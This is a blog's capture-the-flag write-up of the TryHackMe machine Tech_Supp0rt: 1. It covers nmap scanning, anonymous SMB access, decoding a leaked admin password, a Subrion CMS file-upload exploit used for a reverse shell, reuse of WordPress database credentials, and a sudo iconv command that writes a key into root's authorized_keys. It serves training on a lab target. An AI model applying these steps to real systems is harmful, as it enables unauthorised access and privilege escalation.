d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-techsupp0rt1-thm/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

163 lines
5.1 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

---
title: "Writeup - Tech_Supp0rt: 1 (THM)"
date: 2022-05-14
slug: "writeup-techsupp0rt1-thm"
type: "writeup-ctf"
---
This is a writeup for the [Tech\_Supp0rt](https://tryhackme.com/room/techsupp0rt1) machine from the TryHackMe site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV -T4 -Pn 10.10.222.86
```
Four TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.2p2)
- 80/tcp : HTTP web server (Apache 2.4.18)
- 139/tcp : Samba (3.X - 4.X)
- 445/tcp : Samba  (3.X - 4.X)
![](img/image-2.webp)
## Exploit
First, I start by scanning the site's folders.
![](img/image-3.webp)
We find 2 interesting files:
![](img/image-4.webp)
![](img/image-5.webp)
After some research on the 2 sites, I decide to look at the smb server. For that I try to connect anonymously.
![](img/image-6.webp)
It works and I can get an `enter.txt` file.
```bash
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
```
In this file we learn the existence of another site in the `Subrion` folder, but in addition we are provided with credentials for it. After testing, the password doesn't seem to work. So I make a scan of the file to see if I can find something interesting:
![](img/image-7.webp)
A `robots.txt` file but nothing special in it:
```bash
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/
```
So I try to decrypt the password with CyberChef. As soon as I propose the string of characters, CyberChef decodes the following string of characters: [Cyberchef](https://gchq.github.io/CyberChef/#recipe=From_Base58('123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz',false)From_Base32('A-Z2-7%3D',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=N3NLdm50WGRQRUpheGF6Y2U5UFhpMjR6YUZyTGlLV0Nr)
![](img/image-8.webp)
So I try to use this password.
![](img/image-9.webp)
Now that I am connected and I know the version of Subrion, I start looking for exploits to have a reverse shell.
```bash
┌──(d3vyce㉿kali)-[~]
└─$ searchsploit subrion 4.2.1
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin) | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
Quickly I find a file sending exploit that would allow to get a reverse shell. I download it with the following command:
```bash
searchsploit -x php/webapps/49876.py > exploit.py
```
Then I run it with the following command:
![](img/image-10.webp)
Another solution to have a reverse shell would have been to use the upload page present in : content -> upload. While trying this solution I noticed that the version with the `.php` extension does not work but the `.phar` version does:
![](img/image-11.webp)
Searching I find that the first flag is held by the user `scamsite`. So I go to the wordpress folder to see if I can find information in the configuration files:
```bash
[...]
/** MySQL database username */
define( 'DB_USER', 'support' );
/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
[...]
```
So I try to connect via SSH with this password and it works. So I can recover the first flag.
![](img/image-12.webp)
## Privilege escalation
I start by looking at the sudo permissions:
![](img/image-13.webp)
My user has the right to execute the `iconv` command with root rights, so I'm looking for exploits on the GTFObin site: [iconv](https://gtfobins.github.io/gtfobins/iconv/#sudo).
There is a possibility to write in a file with this command. I will write my public RSA key in the `authorized_keys` to be able to connect in SSH:
```bash
echo "id_rsa.pub" | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys
```
I now have a root shell and can retrieve the last flag.
![](img/image-14.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Do not allow anonymous access on an SMB server
- Do not leave passwords in accessible files
- Do not leave executable applications with sudo root if not necessary
Reference in New Issue View Git Blame Copy Permalink